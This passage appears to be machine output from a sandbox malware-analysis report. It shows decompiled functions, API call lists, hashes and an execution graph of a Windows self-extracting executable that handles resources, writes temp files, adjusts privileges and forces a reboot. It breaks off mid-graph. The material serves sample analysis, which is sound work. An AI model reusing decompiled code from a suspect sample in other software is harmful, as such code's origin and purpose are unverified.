                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E000C44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: e23c63c0a666e454c502658f2b8dea84ebd82614831a7653c3d669f63a947c0d
                                                                                                                                                                                                        • Instruction ID: 4b38bcff735cce188047bcc3abf3ce22049a18cde04c4f996442226f52c25d0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e23c63c0a666e454c502658f2b8dea84ebd82614831a7653c3d669f63a947c0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01DB72600919BBDB205F599C48EBF76ACEB85765F140119FE1093150D776CD10C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 000C36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: a9f8cd12f04042cc223c90a117f96f77f6631ddc3637d98e0a358e970334dbf3
                                                                                                                                                                                                        • Instruction ID: 5eeaa5804b10433bf6d5964efe1d0e035a443e8309dcc3fa14acfeb6c8406ed2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9f8cd12f04042cc223c90a117f96f77f6631ddc3637d98e0a358e970334dbf3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2018472A002187BDB304BA65C4CFEF77BCEB86B14F04811DBD05E2280D6648640C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E000C65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,000C2B33), ref: 000C6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 000C6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 000C6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 000C6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: ce1b1f552a5f9128b194e5a1adbd74cdd356f392cbc410501a1780569a6180ae
                                                                                                                                                                                                        • Instruction ID: 0cedbb81fbba98d45d27f9b956400b9f3fcb610b872c265d651eb66779ba6488
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce1b1f552a5f9128b194e5a1adbd74cdd356f392cbc410501a1780569a6180ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0F0F4321045506EE7321B298C8CEBFBFDCCF87258B2D01AFE89182111D61A0D068662
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:960
                                                                                                                                                                                                        Total number of Limit Nodes:24
3162->3164 3165 1f329d 3163->3165 3166 1f4295 GetTempPathA 3164->3166 3171 1f42e1 3164->3171 3165->3136 3165->3144 3167 1f42ad 3166->3167 3167->3167 3168 1f42b4 CharPrevA 3167->3168 3169 1f42d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 1f4390 FreeLibrary 3170->3165 3171->3170 3174 1f4463 SetWindowPos 3172->3174 3175 1f6ce0 4 API calls 3174->3175 3176 1f33f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3129 3176->3136 3177 1f4a50 3178 1f4a9f ReadFile 3177->3178 3179 1f4a66 3177->3179 3180 1f4abb 3178->3180 3179->3180 3181 1f4a82 memcpy 3179->3181 3181->3180 3182 1f3450 3183 1f345e 3182->3183 3184 1f34d3 EndDialog 3182->3184 3185 1f349a GetDesktopWindow 3183->3185 3189 1f3465 3183->3189 3186 1f346a 3184->3186 3187 1f43d0 11 API calls 3185->3187 3188 1f34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3187->3188 3188->3186 3189->3186 3190 1f348c EndDialog 3189->3190 3190->3186 3191 1f6c03 3192 1f6c1e 3191->3192 3193 1f6c17 _exit 3191->3193 3194 1f6c27 _cexit 3192->3194 3195 1f6c32 3192->3195 3193->3192 3194->3195 2353 1f6f40 SetUnhandledExceptionFilter 2354 1f4cc0 GlobalFree 3196 1f4200 3197 1f421e 3196->3197 3198 1f420b SendMessageA 3196->3198 3198->3197 3199 1f3100 3200 1f31b0 3199->3200 3201 1f3111 3199->3201 3202 1f3141 3200->3202 3203 1f31b9 SendDlgItemMessageA 3200->3203 3204 1f311d 3201->3204 3205 1f3149 GetDesktopWindow 3201->3205 3203->3202 3204->3202 3206 1f3138 EndDialog 3204->3206 3207 1f43d0 11 API calls 3205->3207 3206->3202 3208 1f315d 6 API calls 3207->3208 3208->3202 3209 1f4bc0 3211 1f4c05 3209->3211 3212 1f4bd7 3209->3212 3210 1f4c1b SetFilePointer 3210->3212 3211->3210 3211->3212 3213 1f30c0 3214 1f30de CallWindowProcA 3213->3214 3215 1f30ce 3213->3215 3216 1f30da 3214->3216 3215->3214 3215->3216 3217 1f63c0 3218 1f6407 3217->3218 3219 1f658a CharPrevA 3218->3219 3220 1f6415 CreateFileA 3219->3220 3221 1f643a 3220->3221 3222 1f6448 WriteFile 3220->3222 3225 1f6ce0 4 API calls 3221->3225 3223 1f6465 CloseHandle 3222->3223 
3223->3221 3226 1f648f 3225->3226 3227 1f7270 _except_handler4_common 3228 1f69b0 3229 1f69b5 3228->3229 3237 1f6fbe GetModuleHandleW 3229->3237 3231 1f69c1 __set_app_type __p__fmode __p__commode 3232 1f69f9 3231->3232 3233 1f6a0e 3232->3233 3234 1f6a02 __setusermatherr 3232->3234 3239 1f71ef _controlfp 3233->3239 3234->3233 3236 1f6a13 3238 1f6fcf 3237->3238 3238->3231 3239->3236 3240 1f34f0 3241 1f3504 3240->3241 3259 1f35b8 3240->3259 3242 1f35be GetDesktopWindow 3241->3242 3243 1f351b 3241->3243 3241->3259 3245 1f43d0 11 API calls 3242->3245 3246 1f354f 3243->3246 3247 1f351f 3243->3247 3244 1f3526 3249 1f35d6 3245->3249 3246->3244 3251 1f3559 ResetEvent 3246->3251 3247->3244 3250 1f352d TerminateThread EndDialog 3247->3250 3248 1f3671 EndDialog 3248->3244 3252 1f361d SetWindowTextA CreateThread 3249->3252 3253 1f35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3253 3250->3244 3254 1f44b9 20 API calls 3251->3254 3252->3244 3255 1f3646 3252->3255 3253->3252 3256 1f3581 3254->3256 3257 1f44b9 20 API calls 3255->3257 3258 1f359b SetEvent 3256->3258 3260 1f358a SetEvent 3256->3260 3257->3259 3261 1f3680 4 API calls 3258->3261 3259->3244 3259->3248 3260->3244 3261->3259 3262 1f6ef0 3263 1f6f2d 3262->3263 3265 1f6f02 3262->3265 3264 1f6f27 ?terminate@ 3264->3263 3265->3263 3265->3264 3266 1f6bef _XcptFilter 2355 1f4ca0 GlobalAlloc 2356 1f6a60 2373 1f7155 2356->2373 2358 1f6a65 2359 1f6a76 GetStartupInfoW 2358->2359 2360 1f6a93 2359->2360 2361 1f6aa8 2360->2361 2362 1f6aaf Sleep 2360->2362 2363 1f6ac7 _amsg_exit 2361->2363 2365 1f6ad1 2361->2365 2362->2360 2363->2365 2364 1f6b13 _initterm 2369 1f6b2e __IsNonwritableInCurrentImage 2364->2369 2365->2364 2367 1f6af4 2365->2367 2365->2369 2366 1f6bd6 _ismbblead 2366->2369 2368 1f6c1e 2368->2367 2370 1f6c27 _cexit 2368->2370 2369->2366 2369->2368 2372 1f6bbe exit 2369->2372 2378 1f2bfb GetVersion 2369->2378 2370->2367 2372->2369 2374 1f717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId 
GetTickCount QueryPerformanceCounter 2373->2374 2375 1f717a 2373->2375 2377 1f71cd 2374->2377 2375->2374 2376 1f71e2 2375->2376 2376->2358 2377->2376 2379 1f2c0f 2378->2379 2380 1f2c50 2378->2380 2379->2380 2382 1f2c13 GetModuleHandleW 2379->2382 2395 1f2caa memset memset memset 2380->2395 2382->2380 2383 1f2c22 GetProcAddress 2382->2383 2383->2380 2392 1f2c34 2383->2392 2385 1f2c8e 2386 1f2c9e 2385->2386 2387 1f2c97 CloseHandle 2385->2387 2386->2369 2387->2386 2392->2380 2393 1f2c89 2489 1f1f90 2393->2489 2506 1f468f FindResourceA SizeofResource 2395->2506 2398 1f2ef3 2401 1f44b9 20 API calls 2398->2401 2399 1f2d2d CreateEventA SetEvent 2400 1f468f 7 API calls 2399->2400 2402 1f2d57 2400->2402 2403 1f2d6e 2401->2403 2404 1f2d5b 2402->2404 2406 1f2e1f 2402->2406 2409 1f468f 7 API calls 2402->2409 2407 1f6ce0 4 API calls 2403->2407 2405 1f44b9 20 API calls 2404->2405 2405->2403 2511 1f5c9e 2406->2511 2410 1f2c62 2407->2410 2412 1f2d9f 2409->2412 2410->2385 2436 1f2f1d 2410->2436 2412->2404 2415 1f2da3 CreateMutexA 2412->2415 2413 1f2e3a 2417 1f2e43 2413->2417 2418 1f2e52 FindResourceA 2413->2418 2414 1f2e30 2414->2398 2415->2406 2416 1f2dbd GetLastError 2415->2416 2416->2406 2419 1f2dca 2416->2419 2537 1f2390 2417->2537 2420 1f2e6e 2418->2420 2421 1f2e64 LoadResource 2418->2421 2424 1f2dea 2419->2424 2425 1f2dd5 2419->2425 2423 1f2e4d 2420->2423 2552 1f36ee GetVersionExA 2420->2552 2421->2420 2423->2403 2427 1f44b9 20 API calls 2424->2427 2426 1f44b9 20 API calls 2425->2426 2428 1f2de8 2426->2428 2429 1f2dff 2427->2429 2431 1f2e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2403 2435 1f6517 24 API calls 2435->2423 2437 1f2f3f 2436->2437 2438 1f2f6c 2436->2438 2440 1f2f5f 2437->2440 2641 1f51e5 2437->2641 2660 1f5164 2438->2660 2788 1f3a3f 2440->2788 2442 1f2f71 2472 1f303c 2442->2472 2673 1f55a0 2442->2673 2448 1f6ce0 4 API calls 2450 1f2c6b 2448->2450 2449 1f2f86 GetSystemDirectoryA 2451 1f658a CharPrevA 2449->2451 2476 1f52b6 2450->2476 2452 1f2fab 
LoadLibraryA 2451->2452 2453 1f2ff7 FreeLibrary 2452->2453 2454 1f2fc0 GetProcAddress 2452->2454 2455 1f3017 SetCurrentDirectoryA 2453->2455 2456 1f3006 2453->2456 2454->2453 2457 1f2fd6 DecryptFileA 2454->2457 2458 1f3026 2455->2458 2459 1f3054 2455->2459 2456->2455 2721 1f621e GetWindowsDirectoryA 2456->2721 2457->2453 2464 1f2ff0 2457->2464 2462 1f44b9 20 API calls 2458->2462 2460 1f3061 2459->2460 2731 1f3b26 2459->2731 2466 1f307a 2460->2466 2460->2472 2740 1f256d 2460->2740 2468 1f3037 2462->2468 2464->2453 2470 1f3098 2466->2470 2751 1f3ba2 2466->2751 2807 1f6285 GetLastError 2468->2807 2470->2472 2473 1f30af 2470->2473 2472->2448 2809 1f4169 2473->2809 2477 1f52d6 2476->2477 2486 1f5316 2476->2486 2480 1f5300 LocalFree LocalFree 2477->2480 2482 1f52eb SetFileAttributesA DeleteFileA 2477->2482 2478 1f5374 2479 1f538c 2478->2479 3115 1f1fe1 2478->3115 2481 1f6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2483 1f2c72 2481->2483 2482->2480 2483->2385 2483->2393 2485 1f535e SetCurrentDirectoryA 2488 1f2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 1f65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 1f1f9a 2489->2490 2492 1f1f9f 2489->2492 2491 1f1ea7 15 API calls 2490->2491 2491->2492 2493 1f1fc0 2492->2493 2494 1f44b9 20 API calls 2492->2494 2497 1f1fd9 2492->2497 2495 1f1fcf ExitWindowsEx 2493->2495 2496 1f1ee2 GetCurrentProcess OpenProcessToken 2493->2496 2493->2497 2494->2493 2495->2497 2499 1f1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2501 1f1f0e 2496->2501 2497->2385 2500 1f1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 1f1f1f 2500->2502 2503 1f44b9 20 API calls 2501->2503 2504 1f6ce0 4 API calls 2502->2504 2503->2502 2505 1f1f8c 2504->2505 2505->2385 2507 1f2d1a 2506->2507 2508 1f46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 1f46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 1f46df memcpy_s FreeResource 2509->2510 2510->2507 2512 1f5e17 2511->2512 2535 1f5cc3 2511->2535 
2514 1f6ce0 4 API calls 2512->2514 2513 1f5dd0 2513->2512 2517 1f5dec GetModuleFileNameA 2513->2517 2516 1f2e2c 2514->2516 2515 1f5ced CharNextA 2515->2535 2516->2413 2516->2414 2517->2512 2518 1f5e0a 2517->2518 2587 1f66c8 2518->2587 2520 1f6218 2596 1f6e2a 2520->2596 2523 1f5e36 CharUpperA 2524 1f61d0 2523->2524 2523->2535 2525 1f44b9 20 API calls 2524->2525 2526 1f61e7 2525->2526 2527 1f61f7 ExitProcess 2526->2527 2528 1f61f0 CloseHandle 2526->2528 2528->2527 2529 1f5f9f CharUpperA 2529->2535 2530 1f5f59 CompareStringA 2530->2535 2531 1f6003 CharUpperA 2531->2535 2532 1f5edc CharUpperA 2532->2535 2533 1f60a2 CharUpperA 2533->2535 2534 1f667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2513 2535->2515 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 1f658a 2535->2592 2538 1f24cb 2537->2538 2541 1f23b9 2537->2541 2539 1f6ce0 4 API calls 2538->2539 2540 1f24dc 2539->2540 2540->2423 2541->2538 2542 1f23e9 FindFirstFileA 2541->2542 2542->2538 2550 1f2407 2542->2550 2543 1f2479 2548 1f2488 SetFileAttributesA DeleteFileA 2543->2548 2544 1f2421 lstrcmpA 2545 1f24a9 FindNextFileA 2544->2545 2546 1f2431 lstrcmpA 2544->2546 2547 1f24bd FindClose RemoveDirectoryA 2545->2547 2545->2550 2546->2545 2546->2550 2547->2538 2548->2545 2549 1f658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 1f2390 5 API calls 2550->2551 2551->2550 2556 1f3737 2552->2556 2558 1f372d 2552->2558 2553 1f44b9 20 API calls 2566 1f39fc 2553->2566 2554 1f6ce0 4 API calls 2555 1f2e92 2554->2555 2555->2403 2555->2423 2567 1f18a3 2555->2567 2556->2558 2559 1f38a4 2556->2559 2556->2566 2603 1f28e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 1f39c1 MessageBeep 2559->2560 2559->2566 2561 1f681f 10 API calls 2560->2561 2562 1f39ce 2561->2562 2563 1f39d8 MessageBoxA 2562->2563 2565 1f67c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2554 2568 1f19b8 2567->2568 2569 1f18d5 2567->2569 2571 1f6ce0 4 API calls 
2568->2571 2632 1f17ee LoadLibraryA 2569->2632 2573 1f19d5 2571->2573 2573->2423 2573->2435 2574 1f18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 1f1900 GetTokenInformation 2574->2575 2576 1f19aa CloseHandle 2575->2576 2577 1f1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 1f1927 LocalAlloc 2577->2578 2579 1f19a9 2578->2579 2580 1f1938 GetTokenInformation 2578->2580 2579->2576 2581 1f194e AllocateAndInitializeSid 2580->2581 2582 1f19a2 LocalFree 2580->2582 2581->2582 2586 1f196e 2581->2586 2582->2579 2583 1f1999 FreeSid 2583->2582 2584 1f1975 EqualSid 2585 1f198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 1f66d5 2587->2588 2589 1f66f3 2588->2589 2591 1f66e5 CharNextA 2588->2591 2599 1f6648 2588->2599 2589->2512 2591->2588 2593 1f659b 2592->2593 2593->2593 2594 1f65b8 CharPrevA 2593->2594 2595 1f65ab 2593->2595 2594->2595 2595->2535 2602 1f6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 1f621d 2600 1f665d IsDBCSLeadByte 2599->2600 2601 1f6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 1f2a62 2603->2604 2611 1f290d 2603->2611 2605 1f2a6e GlobalFree 2604->2605 2606 1f2a75 2604->2606 2605->2606 2606->2559 2608 1f2955 GlobalAlloc 2608->2604 2609 1f2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 1f2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 1f2a80 GlobalUnlock 2611->2612 2613 1f2773 2611->2613 2612->2604 2614 1f27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1f28b2 2613->2615 2616 1f27db 2614->2616 2617 1f28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 1f28a8 GetWindowsDirectoryA 2616->2618 2620 1f27e3 2616->2620 2619 1f28bf 2617->2619 2618->2619 2621 1f28d2 2619->2621 2622 1f658a CharPrevA 2619->2622 2624 1f658a CharPrevA 2620->2624 2623 1f6ce0 4 API calls 2621->2623 2622->2621 2625 1f28e2 2623->2625 2626 1f2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 1f2837 RegQueryValueExA 2626->2627 2628 1f285c 2627->2628 
2629 1f289a RegCloseKey 2627->2629 2630 1f2867 ExpandEnvironmentStringsA 2628->2630 2631 1f287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 1f1826 GetProcAddress 2632->2633 2634 1f1890 2632->2634 2635 1f1889 FreeLibrary 2633->2635 2636 1f1839 AllocateAndInitializeSid 2633->2636 2637 1f6ce0 4 API calls 2634->2637 2635->2634 2636->2635 2639 1f185f FreeSid 2636->2639 2638 1f189f 2637->2638 2638->2568 2638->2574 2639->2635 2642 1f468f 7 API calls 2641->2642 2643 1f51f9 LocalAlloc 2642->2643 2644 1f522d 2643->2644 2645 1f520d 2643->2645 2646 1f468f 7 API calls 2644->2646 2647 1f44b9 20 API calls 2645->2647 2648 1f523a 2646->2648 2649 1f521e 2647->2649 2650 1f523e 2648->2650 2651 1f5262 lstrcmpA 2648->2651 2652 1f6285 GetLastError 2649->2652 2653 1f44b9 20 API calls 2650->2653 2654 1f527e 2651->2654 2655 1f5272 LocalFree 2651->2655 2657 1f2f4d 2652->2657 2656 1f524f LocalFree 2653->2656 2658 1f44b9 20 API calls 2654->2658 2655->2657 2656->2657 2657->2438 2657->2440 2657->2472 2659 1f5290 LocalFree 2658->2659 2659->2657 2661 1f468f 7 API calls 2660->2661 2662 1f5175 2661->2662 2663 1f517a 2662->2663 2664 1f51af 2662->2664 2665 1f44b9 20 API calls 2663->2665 2666 1f468f 7 API calls 2664->2666 2667 1f518d 2665->2667 2668 1f51c0 2666->2668 2667->2442 2822 1f6298 2668->2822 2671 1f51e1 2671->2442 2672 1f44b9 20 API calls 2672->2667 2674 1f468f 7 API calls 2673->2674 2675 1f55c7 LocalAlloc 2674->2675 2676 1f55fd 2675->2676 2677 1f55db 2675->2677 2679 1f468f 7 API calls 2676->2679 2678 1f44b9 20 API calls 2677->2678 2680 1f55ec 2678->2680 2681 1f560a 2679->2681 2682 1f6285 GetLastError 2680->2682 2683 1f560e 2681->2683 2684 1f5632 lstrcmpA 2681->2684 2696 1f55f1 2682->2696 2685 1f44b9 20 API calls 2683->2685 2686 1f564b LocalFree 2684->2686 2687 1f5645 2684->2687 2688 1f561f LocalFree 2685->2688 2689 1f565b 2686->2689 2690 1f5696 2686->2690 2687->2686 2688->2696 2695 1f5467 49 API calls 2689->2695 2691 1f589f 2690->2691 2694 1f56ae GetTempPathA 2690->2694 2692 1f6517 24 
